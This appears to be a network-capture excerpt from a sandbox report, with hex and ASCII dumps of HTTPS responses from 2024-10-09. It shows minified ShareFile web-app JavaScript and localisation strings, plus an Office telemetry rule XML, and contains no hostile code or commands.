                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 41 3a 28 29 3d 3e 6e 7d 29 7d 2c 39 32 31 34 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 54 3a 28 29 3d 3e 63 2c 69 3a 28 29 3d 3e 69 2c 75 3a 28 29 3d 3e 75 2c 77 3a 28 29 3d 3e 73 7d 29 3b 76 61 72 20 6e 3d 72 28 34 37 32 36 29 2c 6f 3d 72 28 35 36 35 35 29 2c 69 3d 28 72 28 37 35 36 34 29 2c 72 28 31 32 38 37 29 2c 21 31 29 2c 61 3d 6e 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 3f 28 30 2c 6f 2e 41 29 28 7b 6b 65 79 3a 22 63 73 73 22 7d 29 3a 6e 75 6c 6c 29 2c 73 3d 28 61 2e 50 72 6f 76 69 64 65 72 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 6e 2e 66 6f 72 77 61 72 64 52 65 66 29 28 28 66
                                                                                                                                                                                                                                                                                Data Ascii: A:()=>n})},9214:(e,t,r)=>{"use strict";r.d(t,{T:()=>c,i:()=>i,u:()=>u,w:()=>s});var n=r(4726),o=r(5655),i=(r(7564),r(1287),!1),a=n.createContext("undefined"!=typeof HTMLElement?(0,o.A)({key:"css"}):null),s=(a.Provider,function(e){return(0,n.forwardRef)((f
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 63 6f 6e 73 74 20 74 3d 67 28 22 70 72 6f 6a 65 63 74 73 22 2c 7b 6d 65 74 68 6f 64 3a 22 50 4f 53 54 22 2c 62 6f 64 79 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 2c 68 65 61 64 65 72 73 3a 7b 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 7d 29 2c 72 3d 79 69 65 6c 64 20 62 28 74 2c 7b 65 78 70 65 63 74 65 64 53 74 61 74 75 73 3a 32 30 31 2c 64 65 66 61 75 6c 74 45 72 72 6f 72 4d 65 73 73 61 67 65 3a 22 55 6e 61 62 6c 65 20 74 6f 20 63 72 65 61 74 65 20 70 72 6f 6a 65 63 74 22 7d 29 3b 72 65 74 75 72 6e 20 79 69 65 6c 64 20 72 2e 6a 73 6f 6e 28 29 7d 29 29 7d 2c 67 65 74 53 6f 72 74 65 64 50 72 6f 6a
                                                                                                                                                                                                                                                                                Data Ascii: is,void 0,void 0,(function*(){const t=g("projects",{method:"POST",body:JSON.stringify(e),headers:{"content-type":"application/json"}}),r=yield b(t,{expectedStatus:201,defaultErrorMessage:"Unable to create project"});return yield r.json()}))},getSortedProj
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2c 53 3d 65 3d 3e 7b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 64 28 65 29 29 72 65 74 75 72 6e 21 31 3b 63 6f 6e 73 74 20 74 3d 6c 28 65 29 3b 72 65 74 75 72 6e 21 28 6e 75 6c 6c 21 3d 3d 74 26 26 74 21 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 26 26 6e 75 6c 6c 21 3d 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 7c 7c 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 20 69 6e 20 65 7c 7c 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 20 69 6e 20 65 29 7d 2c 6b 3d 70 28 22 44 61 74 65 22 29 2c 6a 3d 70 28 22 46 69 6c 65 22 29 2c 4f 3d 70 28 22 42 6c 6f 62 22 29 2c 5f 3d 70 28 22 46 69 6c 65 4c 69 73 74 22 29 2c 52 3d 70 28 22 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d
                                                                                                                                                                                                                                                                                Data Ascii: ject"==typeof e,S=e=>{if("object"!==d(e))return!1;const t=l(e);return!(null!==t&&t!==Object.prototype&&null!==Object.getPrototypeOf(t)||Symbol.toStringTag in e||Symbol.iterator in e)},k=p("Date"),j=p("File"),O=p("Blob"),_=p("FileList"),R=p("URLSearchParam
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 65 28 29 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 29 7b 72 65 74 75 72 6e 21 28 21 65 7c 7c 21 65 2e 5f 5f 43 41 4e 43 45 4c 5f 5f 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 65 28 65 2c 74 2c 72 29 7b 6e 65 2e 63 61 6c 6c 28 74 68 69 73 2c 6e 75 6c 6c 3d 3d 65 3f 22 63 61 6e 63 65 6c 65 64 22 3a 65 2c 6e 65 2e 45 52 52 5f 43 41 4e 43 45 4c 45 44 2c 74 2c 72 29 2c 74 68 69 73 2e 6e 61 6d 65 3d 22 43 61 6e 63 65 6c 65 64 45 72 72 6f 72 22 7d 51 2e 69 6e 68 65 72 69 74 73 28 4c 65 2c 6e 65 2c 7b 5f 5f 43 41 4e 43 45 4c 5f 5f 3a 21 30 7d 29 3b 63 6f 6e 73 74 20 4e 65 3d 4c 65 3b 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 74 2c 72 29 7b 63 6f 6e 73 74 20 6e 3d 72 2e 63 6f 6e 66 69 67 2e 76 61 6c 69 64 61 74 65 53 74 61 74 75 73 3b 72 2e 73 74 61 74 75 73 26 26
                                                                                                                                                                                                                                                                                Data Ascii: e(),i}function Ie(e){return!(!e||!e.__CANCEL__)}function Le(e,t,r){ne.call(this,null==e?"canceled":e,ne.ERR_CANCELED,t,r),this.name="CanceledError"}Q.inherits(Le,ne,{__CANCEL__:!0});const Ne=Le;function De(e,t,r){const n=r.config.validateStatus;r.status&&
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 52 65 64 69 72 65 63 74 3a 33 30 37 2c 50 65 72 6d 61 6e 65 6e 74 52 65 64 69 72 65 63 74 3a 33 30 38 2c 42 61 64 52 65 71 75 65 73 74 3a 34 30 30 2c 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 34 30 31 2c 50 61 79 6d 65 6e 74 52 65 71 75 69 72 65 64 3a 34 30 32 2c 46 6f 72 62 69 64 64 65 6e 3a 34 30 33 2c 4e 6f 74 46 6f 75 6e 64 3a 34 30 34 2c 4d 65 74 68 6f 64 4e 6f 74 41 6c 6c 6f 77 65 64 3a 34 30 35 2c 4e 6f 74 41 63 63 65 70 74 61 62 6c 65 3a 34 30 36 2c 50 72 6f 78 79 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 52 65 71 75 69 72 65 64 3a 34 30 37 2c 52 65 71 75 65 73 74 54 69 6d 65 6f 75 74 3a 34 30 38 2c 43 6f 6e 66 6c 69 63 74 3a 34 30 39 2c 47 6f 6e 65 3a 34 31 30 2c 4c 65 6e 67 74 68 52 65 71 75 69 72 65 64 3a 34 31 31 2c 50 72 65 63 6f 6e 64 69 74 69
                                                                                                                                                                                                                                                                                Data Ascii: Redirect:307,PermanentRedirect:308,BadRequest:400,Unauthorized:401,PaymentRequired:402,Forbidden:403,NotFound:404,MethodNotAllowed:405,NotAcceptable:406,ProxyAuthenticationRequired:407,RequestTimeout:408,Conflict:409,Gone:410,LengthRequired:411,Preconditi
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 28 72 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 72 2e 70 72 65 76 3d 72 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 72 2e 70 72 65 76 3d 30 2c 72 2e 6e 65 78 74 3d 33 2c 52 74 2e 70 6f 73 74 28 22 2f 22 2e 63 6f 6e 63 61 74 28 73 2e 78 57 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 63 6c 6f 6e 65 22 29 2c 74 29 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 6e 3d 72 2e 73 65 6e 74 2c 72 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 6e 29 3b 63 61 73 65 20 37 3a 74 68 72 6f 77 20 72 2e 70 72 65 76 3d 37 2c 72 2e 74 30 3d 72 5b 22 63 61 74 63 68 22 5d 28 30 29 2c 6e 65 77 20 45 72 72 6f 72 28 22 45 72 72 6f 72 20 64 75 70 6c 69 63 61 74 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 72 65 71 75 65
                                                                                                                                                                                                                                                                                Data Ascii: function(r){for(;;)switch(r.prev=r.next){case 0:return r.prev=0,r.next=3,Rt.post("/".concat(s.xW,"/").concat(e,"/clone"),t);case 3:return n=r.sent,r.abrupt("return",n);case 7:throw r.prev=7,r.t0=r["catch"](0),new Error("Error duplicating information reque
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 6f 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 28 74 3d 28 30 2c 6e 2e 41 29 28 74 29 29 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 72 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 72 2c 65 7d 7d 2c 38 31 36 38 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 72 65 74 75 72 6e 20 6e 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3f 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b
                                                                                                                                                                                                                                                                                Data Ascii: o(e,t,r){return(t=(0,n.A)(t))in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r,e}},8168:(e,t,r)=>{"use strict";function n(){return n=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC3001INData Raw: 30 2c 74 2e 6a 73 78 29 28 6e 2e 53 6b 65 6c 65 74 6f 6e 2c 7b 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 74 2e 6a 73 78 29 28 49 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 65 29 29 7d 29 7d 2c 4e 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 28 30 2c 62 2e 42 29 28 72 2e 73 66 2e 67 65 74 4c 6f 67 67 65 72 28 29 29 2c 44 28 72 29 2c 72 2e 72 65 67 69 73 74 65 72 50 61 67 65 28 22 2f 22 2e 63 6f 6e 63 61 74 28 6c 2e 48 46 2c 22 2f 3a 69 6e 66 6f 72 6d 61 74 69 6f 6e 52 65 71 75 65 73 74 49 64 2f 62 75 69 6c 64 65 72 22 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 30 2c 74 2e 6a 73 78 29 28 6b 2c 7b 70 69 6c 65 74 41 70 69 3a 72 7d 29 7d 29 29 2c 72 2e 72 65 67 69 73 74 65 72 50 61 67 65 28 22 2f 22 2e 63 6f 6e 63 61 74 28 6c 2e 48
                                                                                                                                                                                                                                                                                Data Ascii: 0,t.jsx)(n.Skeleton,{}),children:(0,t.jsx)(I,Object.assign({},e))})},N=function(r){(0,b.B)(r.sf.getLogger()),D(r),r.registerPage("/".concat(l.HF,"/:informationRequestId/builder"),(function(){return(0,t.jsx)(k,{piletApi:r})})),r.registerPage("/".concat(l.H


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                100192.168.2.64983413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:18 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 499
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                                                x-ms-request-id: 604435ea-501e-00a3-69c9-19c0f2000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180518Z-185b7d577bdxdkz6n7f63e388000000001700000000003wa
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                101192.168.2.64982813.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC419OUTGET /sharefile-web/sharefiledev-doc-gen-pilet/1.2.88/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC550INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 1782918
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 06:42:12 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 01 Oct 2024 10:45:21 GMT
                                                                                                                                                                                                                                                                                ETag: "e43f171e9c550011e58426af8e55dcee"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 0e75d8f2d484ce463fc04f5c422aa178.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: F0mScNBJTY0k2p2YFmTK4ykKijHOh9SeldSRHFpxoHAd3UBIE667Sg==
                                                                                                                                                                                                                                                                                Age: 40986
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 64 6f 63 67 65 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 5f 5f 57 45 42 50 41 43 4b 5f 44 59 4e 41 4d 49 43 5f 45 58 50 4f 52 54 5f 5f 2c 5f 5f 73 79 73 74 65 6d 5f 63 6f 6e 74 65 78 74 5f 5f 29 7b 76 61 72 20 5f 5f 57 45 42 50 41 43 4b 5f 45 58 54 45 52 4e 41 4c 5f 4d
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevdocgenpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(__WEBPACK_DYNAMIC_EXPORT__,__system_context__){var __WEBPACK_EXTERNAL_M
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 74 79 6c 65 22 2c 22 70 72 69 6d 61 72 79 43 6f 6c 6f 72 22 2c 22 73 65 63 6f 6e 64 61 72 79 43 6f 6c 6f 72 22 5d 2c 6d 3d 7b 70 72 69 6d 61 72 79 43 6f 6c 6f 72 3a 22 23 33 33 33 22 2c 73 65 63 6f 6e 64 61 72 79 43 6f 6c 6f 72 3a 22 23 45 36 45 36 45 36 22 2c 63 61 6c 63 75 6c 61 74 65 64 3a 21 31 7d 3b 76 61 72 20 67 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 69 63 6f 6e 2c 6e 3d 65 2e 63 6c 61 73 73 4e 61 6d 65 2c 72 3d 65 2e 6f 6e 43 6c 69 63 6b 2c 61 3d 65 2e 73 74 79 6c 65 2c 6f 3d 65 2e 70 72 69 6d 61 72 79 43 6f 6c 6f 72 2c 6c 3d 65 2e 73 65 63 6f 6e 64 61 72 79 43 6f 6c 6f 72 2c 63 3d 28 30 2c 69 2e 41 29 28 65 2c 68 29 2c 75 3d 73 2e 75 73 65 52 65 66 28 29 2c 64 3d 6d 3b 69 66 28 6f 26 26 28 64 3d 7b 70 72 69 6d 61 72 79 43
                                                                                                                                                                                                                                                                                Data Ascii: tyle","primaryColor","secondaryColor"],m={primaryColor:"#333",secondaryColor:"#E6E6E6",calculated:!1};var g=function(e){var t=e.icon,n=e.className,r=e.onClick,a=e.style,o=e.primaryColor,l=e.secondaryColor,c=(0,i.A)(e,h),u=s.useRef(),d=m;if(o&&(d={primaryC
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 63 68 65 6e 61 62 6c 61 67 65 20 6b 6f 70 69 65 72 74 22 2c 63 72 65 61 74 65 5f 6c 69 6e 6b 3a 22 4c 69 6e 6b 20 65 72 73 74 65 6c 6c 65 6e 22 2c 63 72 65 61 74 65 5f 6e 65 77 5f 6c 69 6e 6b 3a 22 45 69 6e 65 6e 20 77 65 69 74 65 72 65 6e 20 4c 69 6e 6b 20 65 72 73 74 65 6c 6c 65 6e 22 2c 64 65 6c 65 74 65 5f 6c 69 6e 6b 3a 22 4c 69 6e 6b 20 6c c3 b6 73 63 68 65 6e 22 2c 64 65 6c 65 74 65 5f 6d 6f 64 61 6c 5f 63 61 6e 63 65 6c 5f 74 65 78 74 3a 22 41 62 62 72 65 63 68 65 6e 22 2c 64 65 6c 65 74 65 5f 6d 6f 64 61 6c 5f 63 6f 6e 66 69 72 6d 5f 74 65 78 74 3a 22 4c 69 6e 6b 20 6c c3 b6 73 63 68 65 6e 22 2c 64 65 6c 65 74 65 5f 6d 6f 64 61 6c 5f 6d 65 73 73 61 67 65 3a 22 57 65 6e 6e 20 53 69 65 20 64 69 65 73 65 6e 20 4c 69 6e 6b 20 6c c3 b6 73 63 68 65 6e
                                                                                                                                                                                                                                                                                Data Ascii: chenablage kopiert",create_link:"Link erstellen",create_new_link:"Einen weiteren Link erstellen",delete_link:"Link lschen",delete_modal_cancel_text:"Abbrechen",delete_modal_confirm_text:"Link lschen",delete_modal_message:"Wenn Sie diesen Link lschen
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 6d 61 72 6b 3a 22 42 65 69 20 45 69 6e 67 61 62 65 20 76 6f 6e 20 4e 61 6d 65 20 75 6e 64 20 45 2d 4d 61 69 6c 2d 41 64 72 65 73 73 65 20 6b 61 6e 6e 20 6a 65 64 65 72 20 6f 68 6e 65 20 41 6e 6d 65 6c 64 75 6e 67 20 65 69 6e 65 20 4b 6f 70 69 65 20 6d 69 74 20 57 61 73 73 65 72 7a 65 69 63 68 65 6e 20 61 6e 7a 65 69 67 65 6e 2e 22 7d 7d 7d 2c 61 6e 61 6c 79 7a 69 6e 67 5f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 3a 22 44 61 74 65 69 69 6e 68 61 6c 74 20 77 69 72 64 20 61 6e 61 6c 79 73 69 65 72 74 2e 2e 2e 22 2c 61 70 70 6c 79 5f 72 65 63 6f 6d 6d 65 6e 64 65 64 5f 6f 70 74 69 6f 6e 73 3a 22 45 6d 70 66 6f 68 6c 65 6e 65 20 4f 70 74 69 6f 6e 65 6e 20 61 6e 77 65 6e 64 65 6e 22 2c 61 70 70 6c 79 69 6e 67 5f 72 65 63 6f 6d 6d 65 6e 64 65 64 5f 6f 70 74 69 6f 6e
                                                                                                                                                                                                                                                                                Data Ascii: mark:"Bei Eingabe von Name und E-Mail-Adresse kann jeder ohne Anmeldung eine Kopie mit Wasserzeichen anzeigen."}}},analyzing_file_content:"Dateiinhalt wird analysiert...",apply_recommended_options:"Empfohlene Optionen anwenden",applying_recommended_option
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 5f 64 61 79 3a 22 61 66 74 65 72 20 6f 6e 65 20 64 61 79 22 2c 61 66 74 65 72 5f 6f 6e 65 5f 77 65 65 6b 3a 22 61 66 74 65 72 20 61 20 77 65 65 6b 22 2c 61 66 74 65 72 5f 73 69 78 5f 6d 6f 6e 74 68 73 3a 22 61 66 74 65 72 20 73 69 78 20 6d 6f 6e 74 68 73 22 2c 61 66 74 65 72 5f 74 68 72 65 65 5f 6d 6f 6e 74 68 73 3a 22 61 66 74 65 72 20 74 68 72 65 65 20 6d 6f 6e 74 68 73 22 2c 61 66 74 65 72 5f 78 5f 64 61 79 73 3a 22 61 66 74 65 72 20 7b 7b 64 61 79 73 7d 7d 20 64 61 79 73 22 2c 61 66 74 65 72 5f 79 65 61 72 3a 22 61 66 74 65 72 20 61 20 79 65 61 72 22 2c 6e 65 76 65 72 3a 22 6e 65 76 65 72 22 7d 2c 6c 61 74 65 73 74 5f 76 65 72 73 69 6f 6e 3a 22 41 6c 77 61 79 73 20 6c 69 6e 6b 20 74 6f 20 74 68 65 20 6c 61 74 65 73 74 20 76 65 72 73 69 6f 6e 20 6f 66
                                                                                                                                                                                                                                                                                Data Ascii: _day:"after one day",after_one_week:"after a week",after_six_months:"after six months",after_three_months:"after three months",after_x_days:"after {{days}} days",after_year:"after a year",never:"never"},latest_version:"Always link to the latest version of
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 20 6d 65 6e 73 61 6a 65 22 2c 65 64 69 74 5f 6f 70 74 69 6f 6e 73 3a 22 4d 6f 64 69 66 69 63 61 72 20 6f 70 63 69 6f 6e 65 73 22 2c 65 64 69 74 5f 73 69 67 6e 5f 69 6e 3a 22 4d 6f 64 69 66 69 63 61 72 20 28 72 65 71 75 69 65 72 65 20 69 6e 69 63 69 61 72 20 73 65 73 69 c3 b3 6e 29 22 2c 65 6d 61 69 6c 5f 74 69 74 6c 65 3a 22 45 6e 76 69 61 72 20 70 6f 72 20 63 6f 72 72 65 6f 20 65 6c 65 63 74 72 c3 b3 6e 69 63 6f 20 63 6f 6e 20 53 68 61 72 65 46 69 6c 65 22 2c 65 6d 70 74 79 5f 66 6f 6c 64 65 72 3a 22 45 73 74 61 20 63 61 72 70 65 74 61 20 65 73 74 c3 a1 20 76 61 63 c3 ad 61 22 2c 65 6e 63 72 79 70 74 5f 6d 65 73 73 61 67 65 3a 22 43 69 66 72 61 72 20 65 73 74 65 20 63 6f 72 72 65 6f 20 65 6c 65 63 74 72 c3 b3 6e 69 63 6f 22 2c 65 6e 63 72 79 70 74 65 64
                                                                                                                                                                                                                                                                                Data Ascii: mensaje",edit_options:"Modificar opciones",edit_sign_in:"Modificar (requiere iniciar sesin)",email_title:"Enviar por correo electrnico con ShareFile",empty_folder:"Esta carpeta est vaca",encrypt_message:"Cifrar este correo electrnico",encrypted
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC13626INData Raw: 65 73 63 61 72 67 61 20 6e 6f 20 65 73 74 c3 a9 20 64 69 73 70 6f 6e 69 62 6c 65 20 64 75 72 61 6e 74 65 20 75 6e 6f 73 20 6d 69 6e 75 74 6f 73 20 6d 69 65 6e 74 72 61 73 20 73 65 20 63 6f 6d 70 6c 65 74 61 20 65 6c 20 61 6e c3 a1 6c 69 73 69 73 20 64 65 20 64 65 74 65 63 63 69 c3 b3 6e 20 64 65 20 76 69 72 75 73 2e 22 2c 73 65 6e 64 5f 73 75 63 63 65 73 73 3a 22 45 6c 65 6d 65 6e 74 6f 28 73 29 20 65 6e 76 69 61 64 6f 73 20 63 6f 72 72 65 63 74 61 6d 65 6e 74 65 2e 22 2c 73 68 61 72 65 5f 72 65 71 75 65 73 74 5f 73 75 63 63 65 73 73 3a 22 53 6f 6c 69 63 69 74 75 64 20 65 6e 76 69 61 64 61 20 63 6f 72 72 65 63 74 61 6d 65 6e 74 65 22 2c 73 68 61 72 65 5f 73 65 6e 64 5f 73 75 63 63 65 73 73 3a 22 52 65 63 75 72 73 6f 20 63 6f 6d 70 61 72 74 69 64 6f 20 65
                                                                                                                                                                                                                                                                                Data Ascii: escarga no est disponible durante unos minutos mientras se completa el anlisis de deteccin de virus.",send_success:"Elemento(s) enviados correctamente.",share_request_success:"Solicitud enviada correctamente",share_send_success:"Recurso compartido e
